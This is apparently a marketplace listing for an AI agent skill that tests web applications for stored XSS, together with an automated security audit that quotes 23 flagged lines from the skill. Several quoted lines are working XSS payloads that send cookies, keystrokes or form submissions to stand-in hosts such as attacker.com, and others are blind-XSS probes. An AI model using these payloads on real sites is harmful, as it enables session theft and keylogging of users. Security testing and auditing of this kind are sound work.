wstg-inpv-02

Tests for stored cross-site scripting (XSS) vulnerabilities in web applications, ensuring user input is properly sanitized.

Install this skill

73/100

Security score

The wstg-inpv-02 skill was audited on May 24, 2026 and we found 23 security issues across 2 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 51

Template literal with variable interpolation in command context

SourceSKILL.md

```bash

low line 55

External URL reference

SourceSKILL.md

55	TARGET="https://target.com"

low line 107

External URL reference

SourceSKILL.md

107	'<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>',

low line 108

External URL reference

SourceSKILL.md

108	'<img src=x onerror="fetch(\'https://attacker.com/?\'+document.cookie)">',

low line 111

External URL reference

SourceSKILL.md

111	'<script>document.onkeypress=function(e){new Image().src="https://attacker.com/log?k="+e.key}</script>',

low line 114

External URL reference

SourceSKILL.md

114	'<script>document.forms[0].action="https://attacker.com/steal"</script>',

low line 196

External URL reference

SourceSKILL.md

196	<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

low line 197

External URL reference

SourceSKILL.md

197	<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

low line 270

External URL reference

SourceSKILL.md

270	'<script src="https://xsshunter.com/probe.js"></script>',

low line 271

External URL reference

SourceSKILL.md

271	'<img src=x onerror="fetch(\'https://attacker.com/blind?\'+document.cookie)">',

low line 335

External URL reference

SourceSKILL.md

335	tester = StoredXSSTester("https://target.com")

low line 344

External URL reference

SourceSKILL.md

344	"><script src=https://yourxsshunter.xss.ht></script>

low line 345

External URL reference

SourceSKILL.md

345	<img src=x onerror="var i=new Image();i.src='https://yourserver.com/xss?cookie='+btoa(document.cookie)+'&url='+btoa(document.URL)">

low line 350

External URL reference

SourceSKILL.md

350	var exfil = 'https://attacker.com/collect?';

low line 363

External URL reference

SourceSKILL.md

363	<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

low line 366

External URL reference

SourceSKILL.md

366	<svg xmlns="http://www.w3.org/2000/svg">

low line 371

External URL reference

SourceSKILL.md

371	<svg xmlns="http://www.w3.org/2000/svg">

low line 372

External URL reference

SourceSKILL.md

372	<use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/>

low line 376

External URL reference

SourceSKILL.md

376	<svg xmlns="http://www.w3.org/2000/svg">

low line 378

External URL reference

SourceSKILL.md

378	<body xmlns="http://www.w3.org/1999/xhtml">

low line 466

External URL reference

SourceSKILL.md

466	- [OWASP Stored XSS](https://owasp.org/www-community/attacks/xss/)

low line 467

External URL reference

SourceSKILL.md

467	- [PortSwigger Stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored)

low line 468

External URL reference

SourceSKILL.md

468	- [XSS Hunter](https://xsshunter.com/)

Scanned on May 24, 2026

View Security Dashboard

Installation guide →

GitHub Stars 283

Rate this skill

Categorydevelopment

UpdatedMay 29, 2026

openclaw testing backend qa-engineer security-engineer backend-developer development

CyberStrikeus/CyberStrike